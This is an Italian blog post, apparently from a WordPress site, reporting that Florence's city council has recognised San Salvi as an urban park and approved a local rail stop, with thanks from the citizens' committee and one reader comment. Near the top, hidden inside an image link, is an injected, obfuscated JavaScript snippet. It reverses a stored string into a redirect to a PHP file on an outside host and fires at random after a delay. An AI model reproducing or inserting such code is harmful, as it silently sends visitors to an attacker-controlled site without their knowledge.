21 novembre 2018

San Salvi sarà Parco urbano: il Consiglio Comunale riconosce l'area patrimonio di tutti

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/12/Tinaia.jpg”>
opera di un artista della Tinaia

Riceviamo e pubblichiamo

Dopo anni di insistenti battaglie condotte da cittadini, l’area di San Salvi può finalmente fregiarsi dello status di parco urbano, sì, proprio il PARCO DI SAN SALVI!!!
Infatti, lunedì 13, durante il consiglio comunale convocato per l’adozione del nuovo Piano Strutturale, sono stati accolti gli emendamenti, promossi dal comitato, che sollecitavano proprio questa proposta.
E’ stata approvata anche l’attivazione della fermata ferroviaria metropolitana di San Salvi, finora indicata nelle varie cartografie ma mai formalizzata.

E’ un importante punto di svolta con il quale viene riconosciuta l’importanza dello straordinario patrimonio storico e naturalistico del complesso di San Salvi, che, opportunamente integrato con il sistema degli spazi aperti circostanti, potrà essere messo a disposizione del quartiere e della città.
Sarà necessario ridefinire il Piano Urbanistico del 2007 che, violando l’integrità dell’area, tutelata anche dalla Soprintendenza, consentiva lo smembramento del complesso con la trasformazione di alcuni padiglioni in residenze private di lusso.
Recupero edilizio e destinazione pubblica dell’intera area devono essere gli obiettivi che l’istituzione del parco dovrà perseguire, anche attraverso un PROGETTO PILOTA DI PROGETTAZIONE COORDINATA che coinvolga cittadini e mondo della cultura.

E’ un’occasione straordinaria, non lasciamocela sfuggire!
Al più presto, appena sarà disponibile il testo definitivo degli emendamenti approvati, potremo valutare meglio le conseguenze dell’approvazione delle nostre proposte.

Il Comitato “San Salvi chi può” ringrazia la consigliera Ornella De Zordo che ha proposto ed efficacemente sostenuto  l’emendamento derivante dall’attività pluriennale del comitato stesso.

Il Comitato SanSalvichipuò si riunisce ogni venerdì alle ore 18.00 presso il Circolo Arci “A. del Sarto” in Via Manara 12.

0 Comments

  1. Silvia

    Questa è una bellissima notizia un grazie a tutti i componenti del Comitato che con il loro impegno hanno saputo scongiurare lo scempio

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *